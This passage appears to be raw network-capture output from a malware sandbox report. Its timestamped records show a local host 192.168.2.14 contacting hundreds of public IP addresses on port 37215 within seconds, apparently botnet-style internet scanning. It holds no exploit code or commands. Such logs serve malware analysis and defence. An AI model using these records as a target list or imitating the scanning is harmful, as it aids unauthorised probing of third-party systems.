                                            Jun 14, 2024 10:43:38.785756111 CEST372156611197.202.174.54192.168.2.14
                                            Jun 14, 2024 10:43:38.785765886 CEST372156611156.189.31.235192.168.2.14
                                            Jun 14, 2024 10:43:38.785775900 CEST37215661141.241.223.81192.168.2.14
                                            Jun 14, 2024 10:43:38.785785913 CEST372156611197.229.113.238192.168.2.14
                                            Jun 14, 2024 10:43:38.785793066 CEST661137215192.168.2.14156.189.31.235
                                            Jun 14, 2024 10:43:38.785794020 CEST661137215192.168.2.14197.202.174.54
                                            Jun 14, 2024 10:43:38.785795927 CEST37215661141.124.229.199192.168.2.14
                                            Jun 14, 2024 10:43:38.785808086 CEST37215661141.150.202.80192.168.2.14
                                            Jun 14, 2024 10:43:38.785814047 CEST661137215192.168.2.1441.241.223.81
                                            Jun 14, 2024 10:43:38.785815001 CEST661137215192.168.2.14197.229.113.238
                                            Jun 14, 2024 10:43:38.785816908 CEST37215661141.7.203.252192.168.2.14
                                            Jun 14, 2024 10:43:38.785828114 CEST372156611197.18.189.212192.168.2.14
                                            Jun 14, 2024 10:43:38.785829067 CEST661137215192.168.2.1441.124.229.199
                                            Jun 14, 2024 10:43:38.785830975 CEST661137215192.168.2.1441.150.202.80
                                            Jun 14, 2024 10:43:38.785837889 CEST37215661141.241.196.232192.168.2.14
                                            Jun 14, 2024 10:43:38.785844088 CEST661137215192.168.2.1441.3.0.148
                                            Jun 14, 2024 10:43:38.785847902 CEST661137215192.168.2.14156.121.18.120
                                            Jun 14, 2024 10:43:38.785847902 CEST661137215192.168.2.14156.123.179.165
                                            Jun 14, 2024 10:43:38.785847902 CEST661137215192.168.2.1441.244.186.25
                                            Jun 14, 2024 10:43:38.785847902 CEST661137215192.168.2.14156.114.209.67
                                            Jun 14, 2024 10:43:38.785847902 CEST661137215192.168.2.14156.249.23.235
                                            Jun 14, 2024 10:43:38.785851002 CEST372156611156.221.59.122192.168.2.14
                                            Jun 14, 2024 10:43:38.785847902 CEST661137215192.168.2.14156.93.123.151
                                            Jun 14, 2024 10:43:38.785847902 CEST661137215192.168.2.14156.147.47.111
                                            Jun 14, 2024 10:43:38.785852909 CEST661137215192.168.2.1441.7.203.252
                                            Jun 14, 2024 10:43:38.785861015 CEST661137215192.168.2.14197.18.189.212
                                            Jun 14, 2024 10:43:38.785861969 CEST372156611156.6.83.192192.168.2.14
                                            Jun 14, 2024 10:43:38.785866976 CEST661137215192.168.2.1441.241.196.232
                                            Jun 14, 2024 10:43:38.785871983 CEST37215661141.232.239.102192.168.2.14
                                            Jun 14, 2024 10:43:38.785872936 CEST661137215192.168.2.14156.135.18.30
                                            Jun 14, 2024 10:43:38.785881996 CEST661137215192.168.2.14156.221.59.122
                                            Jun 14, 2024 10:43:38.785882950 CEST372156611197.36.37.62192.168.2.14
                                            Jun 14, 2024 10:43:38.785893917 CEST372156611197.27.182.101192.168.2.14
                                            Jun 14, 2024 10:43:38.785896063 CEST661137215192.168.2.14156.6.83.192
                                            Jun 14, 2024 10:43:38.785903931 CEST37215661141.36.117.78192.168.2.14
                                            Jun 14, 2024 10:43:38.785906076 CEST661137215192.168.2.1441.232.239.102
                                            Jun 14, 2024 10:43:38.785913944 CEST661137215192.168.2.14197.36.37.62
                                            Jun 14, 2024 10:43:38.785914898 CEST372156611156.3.195.204192.168.2.14
                                            Jun 14, 2024 10:43:38.785926104 CEST372156611156.52.112.204192.168.2.14
                                            Jun 14, 2024 10:43:38.785926104 CEST661137215192.168.2.14197.27.182.101
                                            Jun 14, 2024 10:43:38.785928965 CEST661137215192.168.2.1441.36.117.78
                                            Jun 14, 2024 10:43:38.785936117 CEST37215661141.46.168.23192.168.2.14
                                            Jun 14, 2024 10:43:38.785944939 CEST661137215192.168.2.14156.3.195.204
                                            Jun 14, 2024 10:43:38.785945892 CEST37215661141.192.253.160192.168.2.14
                                            Jun 14, 2024 10:43:38.785957098 CEST37215661141.191.128.5192.168.2.14
                                            Jun 14, 2024 10:43:38.785959005 CEST661137215192.168.2.14156.52.112.204
                                            Jun 14, 2024 10:43:38.785967112 CEST37215661141.125.30.145192.168.2.14
                                            Jun 14, 2024 10:43:38.785970926 CEST661137215192.168.2.1441.46.168.23
                                            Jun 14, 2024 10:43:38.785972118 CEST661137215192.168.2.1441.192.253.160
                                            Jun 14, 2024 10:43:38.785981894 CEST372156611197.53.126.156192.168.2.14
                                            Jun 14, 2024 10:43:38.785990953 CEST661137215192.168.2.1441.191.128.5
                                            Jun 14, 2024 10:43:38.785993099 CEST372156611156.171.109.104192.168.2.14
                                            Jun 14, 2024 10:43:38.786001921 CEST661137215192.168.2.1441.125.30.145
                                            Jun 14, 2024 10:43:38.786003113 CEST37215661141.222.183.158192.168.2.14
                                            Jun 14, 2024 10:43:38.786020041 CEST661137215192.168.2.14197.53.126.156
                                            Jun 14, 2024 10:43:38.786020994 CEST661137215192.168.2.14156.171.109.104
                                            Jun 14, 2024 10:43:38.786041021 CEST661137215192.168.2.1441.222.183.158
                                            Jun 14, 2024 10:43:38.786390066 CEST37215661141.7.38.149192.168.2.14
                                            Jun 14, 2024 10:43:38.786401987 CEST372156611197.167.11.241192.168.2.14
                                            Jun 14, 2024 10:43:38.786411047 CEST37215661141.194.187.118192.168.2.14
                                            Jun 14, 2024 10:43:38.786421061 CEST372156611197.107.144.207192.168.2.14
                                            Jun 14, 2024 10:43:38.786431074 CEST372156611156.251.138.132192.168.2.14
                                            Jun 14, 2024 10:43:38.786433935 CEST661137215192.168.2.1441.7.38.149
                                            Jun 14, 2024 10:43:38.786433935 CEST661137215192.168.2.14197.167.11.241
                                            Jun 14, 2024 10:43:38.786442995 CEST372156611197.190.62.144192.168.2.14
                                            Jun 14, 2024 10:43:38.786442995 CEST661137215192.168.2.1441.194.187.118
                                            Jun 14, 2024 10:43:38.786442995 CEST661137215192.168.2.14197.107.144.207
                                            Jun 14, 2024 10:43:38.786453962 CEST372156611156.76.209.128192.168.2.14
                                            Jun 14, 2024 10:43:38.786463976 CEST661137215192.168.2.14156.251.138.132
                                            Jun 14, 2024 10:43:38.786468983 CEST372156611156.16.234.215192.168.2.14
                                            Jun 14, 2024 10:43:38.786479950 CEST37215661141.193.247.157192.168.2.14
                                            Jun 14, 2024 10:43:38.786489964 CEST372156611156.95.217.92192.168.2.14
                                            Jun 14, 2024 10:43:38.786489964 CEST661137215192.168.2.14197.190.62.144
                                            Jun 14, 2024 10:43:38.786489964 CEST661137215192.168.2.14156.76.209.128
                                            Jun 14, 2024 10:43:38.786501884 CEST661137215192.168.2.14156.16.234.215
                                            Jun 14, 2024 10:43:38.786509991 CEST372156611156.35.143.17192.168.2.14
                                            Jun 14, 2024 10:43:38.786515951 CEST661137215192.168.2.1441.193.247.157
                                            Jun 14, 2024 10:43:38.786520958 CEST372156611156.100.46.16192.168.2.14
                                            Jun 14, 2024 10:43:38.786525011 CEST661137215192.168.2.14156.95.217.92
                                            Jun 14, 2024 10:43:38.786533117 CEST372156611156.115.247.76192.168.2.14
                                            Jun 14, 2024 10:43:38.786541939 CEST661137215192.168.2.14156.35.143.17
                                            Jun 14, 2024 10:43:38.786545038 CEST37215661141.86.191.225192.168.2.14
                                            Jun 14, 2024 10:43:38.786551952 CEST661137215192.168.2.14156.100.46.16
                                            Jun 14, 2024 10:43:38.786555052 CEST372156611197.111.80.225192.168.2.14
                                            Jun 14, 2024 10:43:38.786565065 CEST372156611197.52.132.92192.168.2.14
                                            Jun 14, 2024 10:43:38.786573887 CEST661137215192.168.2.1441.86.191.225
                                            Jun 14, 2024 10:43:38.786575079 CEST661137215192.168.2.14156.115.247.76
                                            Jun 14, 2024 10:43:38.786576033 CEST372156611197.41.131.92192.168.2.14
                                            Jun 14, 2024 10:43:38.786585093 CEST661137215192.168.2.14197.111.80.225
                                            Jun 14, 2024 10:43:38.786587000 CEST372156611156.228.153.200192.168.2.14
                                            Jun 14, 2024 10:43:38.786597013 CEST372156611156.86.219.186192.168.2.14
                                            Jun 14, 2024 10:43:38.786603928 CEST661137215192.168.2.14197.52.132.92
                                            Jun 14, 2024 10:43:38.786606073 CEST37215661141.88.88.75192.168.2.14
                                            Jun 14, 2024 10:43:38.786607981 CEST661137215192.168.2.14197.41.131.92
                                            Jun 14, 2024 10:43:38.786611080 CEST661137215192.168.2.14156.228.153.200
                                            Jun 14, 2024 10:43:38.786616087 CEST37215661141.236.27.120192.168.2.14
                                            Jun 14, 2024 10:43:38.786623955 CEST661137215192.168.2.14156.86.219.186
                                            Jun 14, 2024 10:43:38.786626101 CEST372156611197.67.192.248192.168.2.14
                                            Jun 14, 2024 10:43:38.786636114 CEST372156611156.189.43.187192.168.2.14
                                            Jun 14, 2024 10:43:38.786638975 CEST661137215192.168.2.1441.236.27.120
                                            Jun 14, 2024 10:43:38.786638975 CEST661137215192.168.2.1441.88.88.75
                                            Jun 14, 2024 10:43:38.786647081 CEST37215661141.253.125.109192.168.2.14
                                            Jun 14, 2024 10:43:38.786657095 CEST37215661141.117.237.90192.168.2.14
                                            Jun 14, 2024 10:43:38.786675930 CEST661137215192.168.2.1441.253.125.109
                                            Jun 14, 2024 10:43:38.786678076 CEST661137215192.168.2.14197.67.192.248
                                            Jun 14, 2024 10:43:38.786678076 CEST661137215192.168.2.14156.189.43.187
                                            Jun 14, 2024 10:43:38.786688089 CEST661137215192.168.2.1441.117.237.90
                                            Jun 14, 2024 10:43:38.786760092 CEST372156611197.227.123.140192.168.2.14
                                            Jun 14, 2024 10:43:38.786771059 CEST372156611197.19.65.244192.168.2.14
                                            Jun 14, 2024 10:43:38.786780119 CEST372156611197.141.166.233192.168.2.14
                                            Jun 14, 2024 10:43:38.786788940 CEST37215661141.68.190.70192.168.2.14
                                            Jun 14, 2024 10:43:38.786798000 CEST661137215192.168.2.14197.227.123.140
                                            Jun 14, 2024 10:43:38.786798954 CEST372156611156.42.57.150192.168.2.14
                                            Jun 14, 2024 10:43:38.786799908 CEST661137215192.168.2.14197.19.65.244
                                            Jun 14, 2024 10:43:38.786808968 CEST372156611156.33.234.192192.168.2.14
                                            Jun 14, 2024 10:43:38.786818981 CEST661137215192.168.2.1441.68.190.70
                                            Jun 14, 2024 10:43:38.786819935 CEST372156611156.254.54.61192.168.2.14
                                            Jun 14, 2024 10:43:38.786820889 CEST661137215192.168.2.14156.42.57.150
                                            Jun 14, 2024 10:43:38.786830902 CEST372156611156.216.100.222192.168.2.14
                                            Jun 14, 2024 10:43:38.786840916 CEST372156611197.135.152.118192.168.2.14
                                            Jun 14, 2024 10:43:38.786842108 CEST661137215192.168.2.14197.141.166.233
                                            Jun 14, 2024 10:43:38.786844015 CEST661137215192.168.2.14156.33.234.192
                                            Jun 14, 2024 10:43:38.786850929 CEST372156611156.220.120.7192.168.2.14
                                            Jun 14, 2024 10:43:38.786858082 CEST661137215192.168.2.14156.216.100.222
                                            Jun 14, 2024 10:43:38.786859035 CEST661137215192.168.2.14156.254.54.61
                                            Jun 14, 2024 10:43:38.786861897 CEST372156611197.37.35.158192.168.2.14
                                            Jun 14, 2024 10:43:38.786868095 CEST661137215192.168.2.14197.135.152.118
                                            Jun 14, 2024 10:43:38.786873102 CEST372156611197.254.162.167192.168.2.14
                                            Jun 14, 2024 10:43:38.786887884 CEST661137215192.168.2.14156.220.120.7
                                            Jun 14, 2024 10:43:38.786891937 CEST372156611156.198.114.147192.168.2.14
                                            Jun 14, 2024 10:43:38.786891937 CEST661137215192.168.2.14197.37.35.158
                                            Jun 14, 2024 10:43:38.786901951 CEST37215661141.192.65.70192.168.2.14
                                            Jun 14, 2024 10:43:38.786907911 CEST661137215192.168.2.14197.254.162.167
                                            Jun 14, 2024 10:43:38.786910057 CEST37215661141.160.22.180192.168.2.14
                                            Jun 14, 2024 10:43:38.786921024 CEST372156611156.194.177.27192.168.2.14
                                            Jun 14, 2024 10:43:38.786922932 CEST661137215192.168.2.14156.198.114.147
                                            Jun 14, 2024 10:43:38.786926985 CEST661137215192.168.2.1441.192.65.70
                                            Jun 14, 2024 10:43:38.786933899 CEST372156611197.134.23.10192.168.2.14
                                            Jun 14, 2024 10:43:38.786946058 CEST372156611197.35.54.134192.168.2.14
                                            Jun 14, 2024 10:43:38.786956072 CEST37215661141.88.103.34192.168.2.14
                                            Jun 14, 2024 10:43:38.786963940 CEST37215661141.193.27.177192.168.2.14
                                            Jun 14, 2024 10:43:38.786967039 CEST661137215192.168.2.14197.134.23.10
                                            Jun 14, 2024 10:43:38.786974907 CEST37215661141.154.35.183192.168.2.14
                                            Jun 14, 2024 10:43:38.786982059 CEST661137215192.168.2.14197.35.54.134
                                            Jun 14, 2024 10:43:38.786983967 CEST661137215192.168.2.1441.88.103.34
                                            Jun 14, 2024 10:43:38.786986113 CEST372156611197.40.163.23192.168.2.14
                                            Jun 14, 2024 10:43:38.786987066 CEST661137215192.168.2.1441.160.22.180
                                            Jun 14, 2024 10:43:38.786987066 CEST661137215192.168.2.14156.194.177.27
                                            Jun 14, 2024 10:43:38.786993980 CEST661137215192.168.2.1441.193.27.177
                                            Jun 14, 2024 10:43:38.786997080 CEST372156611197.151.44.186192.168.2.14
                                            Jun 14, 2024 10:43:38.787002087 CEST661137215192.168.2.1441.154.35.183
                                            Jun 14, 2024 10:43:38.787008047 CEST372156611197.54.111.29192.168.2.14
                                            Jun 14, 2024 10:43:38.787018061 CEST372156611197.150.130.171192.168.2.14
                                            Jun 14, 2024 10:43:38.787028074 CEST372156611197.70.107.29192.168.2.14
                                            Jun 14, 2024 10:43:38.787033081 CEST661137215192.168.2.14197.40.163.23
                                            Jun 14, 2024 10:43:38.787033081 CEST661137215192.168.2.14197.151.44.186
                                            Jun 14, 2024 10:43:38.787036896 CEST372156611197.240.19.5192.168.2.14
                                            Jun 14, 2024 10:43:38.787036896 CEST661137215192.168.2.14197.54.111.29
                                            Jun 14, 2024 10:43:38.787036896 CEST661137215192.168.2.14197.150.130.171
                                            Jun 14, 2024 10:43:38.787049055 CEST372156611197.108.110.143192.168.2.14
                                            Jun 14, 2024 10:43:38.787055016 CEST661137215192.168.2.14197.70.107.29
                                            Jun 14, 2024 10:43:38.787065983 CEST661137215192.168.2.14197.240.19.5
                                            Jun 14, 2024 10:43:38.787069082 CEST372156611197.54.143.119192.168.2.14
                                            Jun 14, 2024 10:43:38.787081003 CEST372156611197.0.6.50192.168.2.14
                                            Jun 14, 2024 10:43:38.787082911 CEST661137215192.168.2.14197.108.110.143
                                            Jun 14, 2024 10:43:38.787091017 CEST372156611197.14.34.11192.168.2.14
                                            Jun 14, 2024 10:43:38.787101984 CEST372156611156.8.32.70192.168.2.14
                                            Jun 14, 2024 10:43:38.787111998 CEST372156611156.158.69.102192.168.2.14
                                            Jun 14, 2024 10:43:38.787121058 CEST372156611197.21.187.20192.168.2.14
                                            Jun 14, 2024 10:43:38.787127972 CEST661137215192.168.2.14197.54.143.119
                                            Jun 14, 2024 10:43:38.787128925 CEST661137215192.168.2.14156.8.32.70
                                            Jun 14, 2024 10:43:38.787127972 CEST661137215192.168.2.14197.0.6.50
                                            Jun 14, 2024 10:43:38.787130117 CEST661137215192.168.2.14156.158.69.102
                                            Jun 14, 2024 10:43:38.787127972 CEST661137215192.168.2.14197.14.34.11
                                            Jun 14, 2024 10:43:38.787132025 CEST37215661141.145.86.18192.168.2.14
                                            Jun 14, 2024 10:43:38.787142992 CEST372156611197.53.222.184192.168.2.14
                                            Jun 14, 2024 10:43:38.787153006 CEST661137215192.168.2.14197.21.187.20
                                            Jun 14, 2024 10:43:38.787153006 CEST37215661141.14.72.52192.168.2.14
                                            Jun 14, 2024 10:43:38.787154913 CEST661137215192.168.2.1441.145.86.18
                                            Jun 14, 2024 10:43:38.787166119 CEST372156611156.23.49.125192.168.2.14
                                            Jun 14, 2024 10:43:38.787169933 CEST661137215192.168.2.14197.53.222.184
                                            Jun 14, 2024 10:43:38.787177086 CEST372156611197.240.119.112192.168.2.14
                                            Jun 14, 2024 10:43:38.787185907 CEST661137215192.168.2.1441.14.72.52
                                            Jun 14, 2024 10:43:38.787188053 CEST372156611156.128.79.106192.168.2.14
                                            Jun 14, 2024 10:43:38.787198067 CEST372156611197.18.22.160192.168.2.14
                                            Jun 14, 2024 10:43:38.787199974 CEST661137215192.168.2.14156.23.49.125
                                            Jun 14, 2024 10:43:38.787208080 CEST372156611156.139.108.107192.168.2.14
                                            Jun 14, 2024 10:43:38.787216902 CEST372156611197.45.248.216192.168.2.14
                                            Jun 14, 2024 10:43:38.787219048 CEST661137215192.168.2.14197.240.119.112
                                            Jun 14, 2024 10:43:38.787225008 CEST661137215192.168.2.14156.128.79.106
                                            Jun 14, 2024 10:43:38.787228107 CEST372156611197.82.5.34192.168.2.14
                                            Jun 14, 2024 10:43:38.787235975 CEST661137215192.168.2.14156.139.108.107
                                            Jun 14, 2024 10:43:38.787239075 CEST372156611197.23.101.72192.168.2.14
                                            Jun 14, 2024 10:43:38.787244081 CEST661137215192.168.2.14197.45.248.216
                                            Jun 14, 2024 10:43:38.787256956 CEST661137215192.168.2.14197.18.22.160
                                            Jun 14, 2024 10:43:38.787259102 CEST661137215192.168.2.14197.82.5.34
                                            Jun 14, 2024 10:43:38.787266016 CEST661137215192.168.2.14197.23.101.72
                                            Jun 14, 2024 10:43:39.277405024 CEST3721544422197.231.184.84192.168.2.14
                                            Jun 14, 2024 10:43:39.278448105 CEST4442237215192.168.2.14197.231.184.84
                                            Jun 14, 2024 10:43:39.780800104 CEST661137215192.168.2.14156.15.199.182
                                            Jun 14, 2024 10:43:39.780798912 CEST661137215192.168.2.14197.103.242.245
                                            Jun 14, 2024 10:43:39.780800104 CEST661137215192.168.2.14156.165.119.187
                                            Jun 14, 2024 10:43:39.780800104 CEST661137215192.168.2.1441.164.127.86
                                            Jun 14, 2024 10:43:39.780807972 CEST661137215192.168.2.14156.122.81.79
                                            Jun 14, 2024 10:43:39.780812979 CEST661137215192.168.2.14156.240.25.175
                                            Jun 14, 2024 10:43:39.780828953 CEST661137215192.168.2.14156.69.19.70
                                            Jun 14, 2024 10:43:39.780828953 CEST661137215192.168.2.14197.117.114.229
                                            Jun 14, 2024 10:43:39.780833006 CEST661137215192.168.2.1441.9.89.193
                                            Jun 14, 2024 10:43:39.780831099 CEST661137215192.168.2.1441.233.184.191
                                            Jun 14, 2024 10:43:39.780831099 CEST661137215192.168.2.1441.199.27.212
                                            Jun 14, 2024 10:43:39.780852079 CEST661137215192.168.2.1441.232.182.83
                                            Jun 14, 2024 10:43:39.780858994 CEST661137215192.168.2.14197.163.224.106
                                            Jun 14, 2024 10:43:39.780859947 CEST661137215192.168.2.1441.154.51.247
                                            Jun 14, 2024 10:43:39.780860901 CEST661137215192.168.2.14156.81.34.45
                                            Jun 14, 2024 10:43:39.780877113 CEST661137215192.168.2.1441.111.240.41
                                            Jun 14, 2024 10:43:39.780877113 CEST661137215192.168.2.14156.90.26.85
                                            Jun 14, 2024 10:43:39.780877113 CEST661137215192.168.2.1441.145.98.163
                                            Jun 14, 2024 10:43:39.780877113 CEST661137215192.168.2.14156.156.62.182
                                            Jun 14, 2024 10:43:39.780889034 CEST661137215192.168.2.14197.149.37.72
                                            Jun 14, 2024 10:43:39.780889988 CEST661137215192.168.2.1441.158.16.212
                                            Jun 14, 2024 10:43:39.780916929 CEST661137215192.168.2.14197.128.166.29
                                            Jun 14, 2024 10:43:39.780917883 CEST661137215192.168.2.1441.13.206.136
                                            Jun 14, 2024 10:43:39.780917883 CEST661137215192.168.2.14197.57.150.89
                                            Jun 14, 2024 10:43:39.780920982 CEST661137215192.168.2.1441.179.39.25
                                            Jun 14, 2024 10:43:39.780922890 CEST661137215192.168.2.14156.21.53.94
                                            Jun 14, 2024 10:43:39.780926943 CEST661137215192.168.2.14156.176.116.187
                                            Jun 14, 2024 10:43:39.780927896 CEST661137215192.168.2.1441.59.162.17
                                            Jun 14, 2024 10:43:39.780922890 CEST661137215192.168.2.14197.124.88.133
                                            Jun 14, 2024 10:43:39.780922890 CEST661137215192.168.2.1441.194.8.16
                                            Jun 14, 2024 10:43:39.780922890 CEST661137215192.168.2.1441.79.42.89
                                            Jun 14, 2024 10:43:39.780922890 CEST661137215192.168.2.1441.52.240.124
                                            Jun 14, 2024 10:43:39.780936003 CEST661137215192.168.2.14197.244.47.194
                                            Jun 14, 2024 10:43:39.780944109 CEST661137215192.168.2.1441.171.176.242
                                            Jun 14, 2024 10:43:39.780944109 CEST661137215192.168.2.1441.165.218.63
                                            Jun 14, 2024 10:43:39.780944109 CEST661137215192.168.2.14156.177.158.186
                                            Jun 14, 2024 10:43:39.780944109 CEST661137215192.168.2.1441.17.64.40
                                            Jun 14, 2024 10:43:39.780946970 CEST661137215192.168.2.14156.59.1.10
                                            Jun 14, 2024 10:43:39.780946970 CEST661137215192.168.2.14197.228.195.149
                                            Jun 14, 2024 10:43:39.780946970 CEST661137215192.168.2.14156.69.33.223
                                            Jun 14, 2024 10:43:39.780947924 CEST661137215192.168.2.14197.131.140.249
                                            Jun 14, 2024 10:43:39.780946970 CEST661137215192.168.2.14197.134.170.190
                                            Jun 14, 2024 10:43:39.780946970 CEST661137215192.168.2.1441.186.136.119
                                            Jun 14, 2024 10:43:39.780949116 CEST661137215192.168.2.14156.116.123.130
                                            Jun 14, 2024 10:43:39.780963898 CEST661137215192.168.2.14156.78.100.216
                                            Jun 14, 2024 10:43:39.780978918 CEST661137215192.168.2.14197.66.84.234
                                            Jun 14, 2024 10:43:39.780978918 CEST661137215192.168.2.14156.66.191.152
                                            Jun 14, 2024 10:43:39.780981064 CEST661137215192.168.2.1441.74.86.49
                                            Jun 14, 2024 10:43:39.780992985 CEST661137215192.168.2.1441.183.17.156
                                            Jun 14, 2024 10:43:39.780992985 CEST661137215192.168.2.14156.83.128.43
                                            Jun 14, 2024 10:43:39.780993938 CEST661137215192.168.2.1441.218.84.161
                                            Jun 14, 2024 10:43:39.780993938 CEST661137215192.168.2.14197.100.131.133
                                            Jun 14, 2024 10:43:39.780994892 CEST661137215192.168.2.1441.165.173.93
                                            Jun 14, 2024 10:43:39.780998945 CEST661137215192.168.2.14197.207.87.91
                                            Jun 14, 2024 10:43:39.780998945 CEST661137215192.168.2.14197.172.35.102
                                            Jun 14, 2024 10:43:39.780998945 CEST661137215192.168.2.14156.115.84.103
                                            Jun 14, 2024 10:43:39.780998945 CEST661137215192.168.2.1441.100.148.228
                                            Jun 14, 2024 10:43:39.780998945 CEST661137215192.168.2.14156.134.53.157
                                            Jun 14, 2024 10:43:39.780998945 CEST661137215192.168.2.14156.192.107.114
                                            Jun 14, 2024 10:43:39.781007051 CEST661137215192.168.2.14197.39.172.85
                                            Jun 14, 2024 10:43:39.781008959 CEST661137215192.168.2.1441.16.93.68
                                            Jun 14, 2024 10:43:39.781013012 CEST661137215192.168.2.14156.2.241.249
                                            Jun 14, 2024 10:43:39.781019926 CEST661137215192.168.2.14197.23.251.116
                                            Jun 14, 2024 10:43:39.781019926 CEST661137215192.168.2.14197.1.62.109
                                            Jun 14, 2024 10:43:39.781033993 CEST661137215192.168.2.14156.22.157.86
                                            Jun 14, 2024 10:43:39.781037092 CEST661137215192.168.2.1441.206.92.84
                                            Jun 14, 2024 10:43:39.781047106 CEST661137215192.168.2.1441.62.54.185
                                            Jun 14, 2024 10:43:39.781049013 CEST661137215192.168.2.1441.179.220.183
                                            Jun 14, 2024 10:43:39.781049013 CEST661137215192.168.2.1441.31.218.239
                                            Jun 14, 2024 10:43:39.781056881 CEST661137215192.168.2.14197.193.48.140
                                            Jun 14, 2024 10:43:39.781056881 CEST661137215192.168.2.14197.209.191.166
                                            Jun 14, 2024 10:43:39.781056881 CEST661137215192.168.2.14156.55.8.44
                                            Jun 14, 2024 10:43:39.781064034 CEST661137215192.168.2.14156.0.232.246
                                            Jun 14, 2024 10:43:39.781073093 CEST661137215192.168.2.1441.209.52.77
                                            Jun 14, 2024 10:43:39.781073093 CEST661137215192.168.2.14197.61.39.5
                                            Jun 14, 2024 10:43:39.781080008 CEST661137215192.168.2.14197.143.9.163
                                            Jun 14, 2024 10:43:39.781083107 CEST661137215192.168.2.14156.217.97.252
                                            Jun 14, 2024 10:43:39.781090975 CEST661137215192.168.2.14197.66.231.125
                                            Jun 14, 2024 10:43:39.781097889 CEST661137215192.168.2.14197.169.57.44
                                            Jun 14, 2024 10:43:39.781100988 CEST661137215192.168.2.14156.163.89.33
                                            Jun 14, 2024 10:43:39.781105042 CEST661137215192.168.2.14156.115.109.252
                                            Jun 14, 2024 10:43:39.781107903 CEST661137215192.168.2.14156.0.158.24
                                            Jun 14, 2024 10:43:39.781107903 CEST661137215192.168.2.1441.213.98.76
                                            Jun 14, 2024 10:43:39.781121016 CEST661137215192.168.2.14156.223.13.28
                                            Jun 14, 2024 10:43:39.781121016 CEST661137215192.168.2.14197.139.209.224
                                            Jun 14, 2024 10:43:39.781122923 CEST661137215192.168.2.14197.71.243.96
                                            Jun 14, 2024 10:43:39.781133890 CEST661137215192.168.2.1441.232.229.67
                                            Jun 14, 2024 10:43:39.781137943 CEST661137215192.168.2.1441.203.65.176
                                            Jun 14, 2024 10:43:39.781138897 CEST661137215192.168.2.14156.8.224.23
                                            Jun 14, 2024 10:43:39.781138897 CEST661137215192.168.2.14156.48.241.25
                                            Jun 14, 2024 10:43:39.781138897 CEST661137215192.168.2.1441.145.233.142
                                            Jun 14, 2024 10:43:39.781141043 CEST661137215192.168.2.1441.230.65.60
                                            Jun 14, 2024 10:43:39.781147003 CEST661137215192.168.2.14156.184.168.68
                                            Jun 14, 2024 10:43:39.781163931 CEST661137215192.168.2.14197.140.248.199
                                            Jun 14, 2024 10:43:39.781163931 CEST661137215192.168.2.14197.252.52.207
                                            Jun 14, 2024 10:43:39.781166077 CEST661137215192.168.2.14197.162.192.42
                                            Jun 14, 2024 10:43:39.781169891 CEST661137215192.168.2.14197.27.2.64
                                            Jun 14, 2024 10:43:39.781172037 CEST661137215192.168.2.14156.44.22.144
                                            Jun 14, 2024 10:43:39.781166077 CEST661137215192.168.2.14156.23.92.179
                                            Jun 14, 2024 10:43:39.781188011 CEST661137215192.168.2.14156.163.12.193
                                            Jun 14, 2024 10:43:39.781188011 CEST661137215192.168.2.14197.23.179.245
                                            Jun 14, 2024 10:43:39.781191111 CEST661137215192.168.2.14197.1.69.245
                                            Jun 14, 2024 10:43:39.781199932 CEST661137215192.168.2.14156.210.141.141
                                            Jun 14, 2024 10:43:39.781199932 CEST661137215192.168.2.14197.205.170.169
                                            Jun 14, 2024 10:43:39.781208038 CEST661137215192.168.2.14156.149.204.29
                                            Jun 14, 2024 10:43:39.781208038 CEST661137215192.168.2.14197.33.210.243
                                            Jun 14, 2024 10:43:39.781208038 CEST661137215192.168.2.14156.160.55.3
                                            Jun 14, 2024 10:43:39.781217098 CEST661137215192.168.2.14197.64.39.150
                                            Jun 14, 2024 10:43:39.781217098 CEST661137215192.168.2.14197.193.123.89
                                            Jun 14, 2024 10:43:39.781227112 CEST661137215192.168.2.1441.27.175.117
                                            Jun 14, 2024 10:43:39.781229973 CEST661137215192.168.2.14156.168.54.140
                                            Jun 14, 2024 10:43:39.781233072 CEST661137215192.168.2.14197.68.197.84
                                            Jun 14, 2024 10:43:39.781233072 CEST661137215192.168.2.14156.4.192.161
                                            Jun 14, 2024 10:43:39.781248093 CEST661137215192.168.2.1441.204.51.114
                                            Jun 14, 2024 10:43:39.781249046 CEST661137215192.168.2.1441.210.22.93
                                            Jun 14, 2024 10:43:39.781249046 CEST661137215192.168.2.14197.87.225.136
                                            Jun 14, 2024 10:43:39.781249046 CEST661137215192.168.2.1441.53.143.0
                                            Jun 14, 2024 10:43:39.781264067 CEST661137215192.168.2.14197.133.122.60
                                            Jun 14, 2024 10:43:39.781264067 CEST661137215192.168.2.14156.164.91.154
                                            Jun 14, 2024 10:43:39.781272888 CEST661137215192.168.2.1441.63.115.65
                                            Jun 14, 2024 10:43:39.781272888 CEST661137215192.168.2.14156.179.181.80
                                            Jun 14, 2024 10:43:39.781275988 CEST661137215192.168.2.14197.199.147.250
                                            Jun 14, 2024 10:43:39.781282902 CEST661137215192.168.2.14156.138.108.172
                                            Jun 14, 2024 10:43:39.781292915 CEST661137215192.168.2.14197.114.134.89
                                            Jun 14, 2024 10:43:39.781294107 CEST661137215192.168.2.14156.239.198.140
                                            Jun 14, 2024 10:43:39.781296968 CEST661137215192.168.2.14197.178.214.214
                                            Jun 14, 2024 10:43:39.781300068 CEST661137215192.168.2.14197.251.55.252
                                            Jun 14, 2024 10:43:39.781307936 CEST661137215192.168.2.1441.50.29.253
                                            Jun 14, 2024 10:43:39.781307936 CEST661137215192.168.2.14197.104.47.130
                                            Jun 14, 2024 10:43:39.781322002 CEST661137215192.168.2.14156.40.150.97
                                            Jun 14, 2024 10:43:39.781322002 CEST661137215192.168.2.14156.91.246.73
                                            Jun 14, 2024 10:43:39.781323910 CEST661137215192.168.2.14156.183.127.88
                                            Jun 14, 2024 10:43:39.781330109 CEST661137215192.168.2.14156.229.95.39
                                            Jun 14, 2024 10:43:39.781330109 CEST661137215192.168.2.1441.129.238.136
                                            Jun 14, 2024 10:43:39.781332970 CEST661137215192.168.2.14197.19.80.99
                                            Jun 14, 2024 10:43:39.781333923 CEST661137215192.168.2.14197.229.217.153
                                            Jun 14, 2024 10:43:39.781332970 CEST661137215192.168.2.1441.222.32.119
                                            Jun 14, 2024 10:43:39.781333923 CEST661137215192.168.2.14197.33.46.246
                                            Jun 14, 2024 10:43:39.781337023 CEST661137215192.168.2.1441.139.209.46
                                            Jun 14, 2024 10:43:39.781337023 CEST661137215192.168.2.14156.162.139.157
                                            Jun 14, 2024 10:43:39.781353951 CEST661137215192.168.2.14156.117.51.135
